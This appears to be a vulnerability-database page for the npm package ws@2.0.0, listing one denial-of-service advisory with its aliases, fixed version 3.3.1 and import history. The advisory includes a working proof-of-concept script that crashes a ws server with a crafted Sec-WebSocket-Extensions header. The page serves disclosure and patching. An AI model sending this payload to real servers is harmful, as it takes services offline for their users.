Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:npm/ws@2.0.0
purl pkg:npm/ws@2.0.0
Next non-vulnerable version 3.3.1
Latest non-vulnerable version 3.3.1
Risk
Vulnerabilities affecting this package (1)
Vulnerability Summary Fixed by
VCID-rqzd-t577-w3e7
Aliases:
GHSA-5v72-xg48-5rpm
GMS-2019-145
Denial of Service in ws Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent. ## Proof of concept ``` const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r' ].join('\r'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` ## Recommendation Update to version 3.3.1 or later.
3.3.1
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-06-02T04:39:18.410379+00:00 GitLab Importer Affected by VCID-rqzd-t577-w3e7 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ws/GMS-2019-145.yml 38.6.0